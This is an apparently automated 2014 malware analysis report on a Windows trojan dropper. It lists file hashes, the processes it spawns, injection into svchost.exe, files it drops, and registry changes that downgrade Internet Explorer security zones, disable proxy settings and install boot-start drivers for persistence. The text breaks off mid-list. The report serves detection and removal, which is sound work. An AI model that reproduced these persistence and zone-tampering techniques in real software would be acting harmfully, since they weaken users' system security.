Trojan.Win32.Delphi_079f56ead4

by malwarelabrobot on April 17th, 2014 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.bjw (Kaspersky), Backdoor.Hupigon.64371 (B) (Emsisoft), Backdoor.Hupigon.64371 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Backdoor, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 079f56ead49c756a3b3252c448b9ffd5
SHA1: 591dc67706272cc3301c19bb96b10d22e6cf5573
SHA256: f75b415a68f6d0b292a9f7f2a77bbdb5ca23a78bffac69665a42a7fbe57577e1
SSDeep: 24576:mKsoFg9ZYBcIZld7XgcTmFZO6mYeVfuS/t04u1:IoFdcm8O/hnF03
Size: 846257 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: Plus HD
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

soft256.exe:2724
cnnic_1009.exe:2892
m4.exe:2840
update.exe:3408
setup.exe:2200
setup.exe:3476
setup.exe:3264
%original file name%.exe:1712
idnsvr.exe:4052

The Trojan injects its code into the following process(es):

svchost.exe:1992

File activity

The process soft256.exe:2724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\e1JePg78g.dll (33 bytes)

The process cnnic_1009.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\setup.exe (12214 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)

The process m4.exe:2840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\MP3\svchost.exe (1281 bytes)

The process update.exe:3408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\version.dat (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\uninstall.exe (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\srchsp.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\path.dat (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.exe (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.dat (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\convf.dll (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\austr.dll (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnrbtn.html (486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.sys (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cuscfg.dat (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ocinfo.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ieaux.dll (172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnreg.dll (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwrep.dat (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.ini (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (0 bytes)

The process setup.exe:2200 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\OCINS\convf.dll (1281 bytes)
%Program Files%\OCINS\replace.dat (343 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\cuscfg.dat (145 bytes)
%Program Files%\OCINS\ctrcfg.ini (230 bytes)
%Program Files%\OCINS\cnrbtn.html (486 bytes)
%System%\drivers\idnaux.sys (10 bytes)
%Program Files%\OCINS\version.dat (482 bytes)
%Program Files%\OCINS\kwrep.dat (191 bytes)
%Program Files%\OCINS\idnaux.dat (39 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\srchsp.dll (32 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)
%WinDir%\ocinfo.dat (8 bytes)
%System%\idnreg.dll (36 bytes)
%Program Files%\OCINS\addrmsg.dll (601 bytes)
%Program Files%\OCINS\addrmsg.ini (6 bytes)

The process setup.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\OCINS\cnprovh.dll (601 bytes)
%Program Files%\OCINS\convs.dll (601 bytes)
%Program Files%\OCINS\cndsv.dll (601 bytes)
%Program Files%\OCINS\config.exe (601 bytes)
%Program Files%\OCINS\cuscfg.dat (148 bytes)
%Program Files%\OCINS\ctrcfg.ini (2949 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\idnsvr.exe (601 bytes)
%Program Files%\OCINS\version.dat (479 bytes)
%Program Files%\OCINS\idnsvr.dll (601 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%Program Files%\OCINS\usrcfg.ini (21 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)

The process setup.exe:3264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.exe (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\ieaux.dll (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\version.dat (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.sys (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnreg.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\uninstall.exe (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\path.dat (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\convs.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\loader.exe (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cuscfg.dat (148 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)

The process %original file name%.exe:1712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

The process idnsvr.exe:4052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\OCINS\update\version.dat (482 bytes)
%Program Files%\OCINS\ctrcfg.ini (4 bytes)
%Program Files%\OCINS\austr.dll (65 bytes)
%Program Files%\OCINS\update\data2.cab (9696 bytes)
%Program Files%\OCINS\update\update.exe (273697 bytes)
%Program Files%\OCINS\update\austr.dll (1568 bytes)
%Program Files%\OCINS\usrcfg.ini (130 bytes)

Registry activity

The process soft256.exe:2724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 6A BD 7E 02 BF AD 37 FC 88 F7 6F 47 B3 F0 1D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process cnnic_1009.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 FC 7A E9 19 9A 0B 73 CD 3F F6 01 BC D3 68 3D"

[HKLM\SOFTWARE\kmedia\cnnic]
"1.0" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"setup.exe" = "国际化域名支持"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process m4.exe:2840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 32 64 65 C7 93 9C 01 27 E3 B3 E7 E3 4E 94 5F"

The process update.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F F0 AD 61 62 B6 59 56 4D 15 69 3D E1 82 EA FD"

The process setup.exe:2200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\OCINS]
"Version" = "2.6.0.42"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\idnaux]
"ErrorControl" = "1"
"ImagePath" = "system32\drivers\idnaux.sys"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"HotIcon" = "%Program Files%\OCINS\config.exe,216"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Default Visible" = "Yes"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"

[HKCR\Idnreg.IdnObj.1]
"(Default)" = "IdnObj Class"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
"(Default)" = "IEAux.IEHlprObj.1"

[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\0\win32]
"(Default)" = "%System%\idnreg.dll"

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\TypeLib]
"Version" = "1.0"

[HKCR\Idnreg.IdnObj.1\CLSID]
"(Default)" = "{61DB8FBD-B64B-401E-BDA7-F36E44180805}"

[HKCR\IEAux.IEHlprObj\CurVer]
"(Default)" = "IEAux.IEHlprObj.1"

[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\HELPDIR]
"(Default)" = "%System%\"

[HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Access Internet Keyword]
"(Default)" = "%Program Files%\OCINS\cnrbtn.html"

[HKLM\System\CurrentControlSet\Services\cnprov]
"Group" = "Boot System Extenders"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9A578C98-3C2F-4630-890B-FC04196EF420}]
"Compatibility Flags" = "1024"

[HKLM\System\CurrentControlSet\Services\idnaux]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"CLSID" = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"

[HKLM\System\CurrentControlSet\Services\idnaux\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"

[HKCR\Idnreg.IdnObj]
"(Default)" = "IdnObj Class"

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}]
"(Default)" = "IIdnObj"

[HKLM\System\CurrentControlSet\Services\idnaux]
"DescriptionName" = "idnaux"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"MenuStatusBar" = "Chinese Navigation"
"MenuText" = "Chinese Navigation"

[HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Access Internet Keyword]
"Contexts" = "127"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"DisplayName" = "Chinese Navigation"

[HKLM\System\CurrentControlSet\Services\idnaux]
"DependOnService" = "Tcpip"

[HKCR\IEAux.IEHlprObj.1]
"(Default)" = "IEAux Class"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IEAux Class"

[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0]
"(Default)" = "idnreg 1.0 Type Library"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "yes"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\VersionIndependentProgID]
"(Default)" = "Idnreg.IdnObj"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
"(Default)" = "IEAux.IEHlprObj"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\TypeLib]
"(Default)" = "{72584095-B0B2-4058-8CDC-6AE69F8B199B}"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}]
"(Default)" = "CNNIC_IDN"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\idnaux]
"DisplayName" = "idnaux"

[HKCR\IEAux.IEHlprObj.1\CLSID]
"(Default)" = "{7605CC7C-00FD-4A5F-BAFD-828342DE6279}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Flags" = "1"

[HKLM\System\CurrentControlSet\Services\cnprov]
"DescriptionName" = "cnprov"

[HKLM\System\CurrentControlSet\Services\cnprov\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\TypeLib]
"(Default)" = "{72584095-B0B2-4058-8CDC-6AE69F8B199B}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"ButtonText" = "Chinese Navigation"

[HKLM\System\CurrentControlSet\Services\cnprov]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\idnaux]
"Group" = "PNP_TDI"

[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 B5 88 65 78 1A 57 62 B3 A9 DB D6 52 6D B3 41"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\ProgID]
"(Default)" = "Idnreg.IdnObj.1"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot System Extenders, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKLM\System\CurrentControlSet\Services\cnprov]
"DisplayName" = "cnprov"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"UninstallString" = "%Program Files%\OCINS\uninstall.exe"

[HKCR\Idnreg.IdnObj\CurVer]
"(Default)" = "Idnreg.IdnObj.1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Icon" = "%Program Files%\OCINS\config.exe,216"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Version" = "*"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "@\??\%System%\@c:\windows\system32\setup.exe.tmp, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3\idnsvr.exe, !\??\%Program Files%\OCINS\idnsvr.exe"

[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Idnreg.IdnObj\CLSID]
"(Default)" = "{61DB8FBD-B64B-401E-BDA7-F36E44180805}"

[HKCR\IEAux.IEHlprObj]
"(Default)" = "IEAux Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Cdfs]
"SystemRoot" = "%WinDir%"

[HKLM\System\CurrentControlSet\Services\cnprov]
"ImagePath" = "system32\drivers\cnprov.sys"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\InprocServer32]
"(Default)" = "%System%\idnreg.dll"

The following driver will be automatically launched by the OS Loader:

[HKLM\System\CurrentControlSet\Services\cnprov]
"Start" = "0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\idnaux]
"Start" = "2"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\Programmable]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\cnprov]
"InstallPath"
"DeleteFlag"

[HKCU\Console]
"KwUnSelf"

[HKLM\System\CurrentControlSet\Services\cnprov]
"SystemRoot"

[HKLM\System\CurrentControlSet\Services\idnaux]
"DeleteFlag"

The process setup.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\OCINS]
"Version" = "2.6.0.0"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot System Extenders, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\0\win32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"HotIcon" = "%Program Files%\OCINS\config.exe,216"
"Default Visible" = "Yes"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\System\CurrentControlSet\Services\Cdfs]
"SystemRoot" = "%WinDir%"

[HKCR\IEAux.IEHlprObj\CurVer]
"(Default)" = "IEAux.IEHlprObj.1"

[HKLM\System\CurrentControlSet\Services\cnprov]
"ImagePath" = "system32\drivers\cnprov.sys"
"Group" = "Boot System Extenders"

[HKLM\SOFTWARE\OCINS]
"InstallPath" = "%Program Files%\OCINS"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"ButtonText" = "Chinese Navigation"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0]
"(Default)" = "IEAux 1.0 Type Library"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"CLSID" = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"UninstallString" = "%Program Files%\OCINS\uninstall.exe"

[HKLM\System\CurrentControlSet\Services\cnprov\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"MenuStatusBar" = "Chinese Navigation"
"MenuText" = "Chinese Navigation"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"DisplayName" = "Chinese Navigation2.6.0.0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9A578C98-3C2F-4630-890B-FC04196EF420}]
"Compatibility Flags" = "1024"

[HKCR\IEAux.IEHlprObj.1]
"(Default)" = "IEAux Class"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IEAux Class"

[HKLM\System\CurrentControlSet\Services\cnprov]
"DescriptionName" = "cnprov"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "yes"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IIEHlprObj"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
"(Default)" = "IEAux.IEHlprObj"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\IEAux.IEHlprObj.1\CLSID]
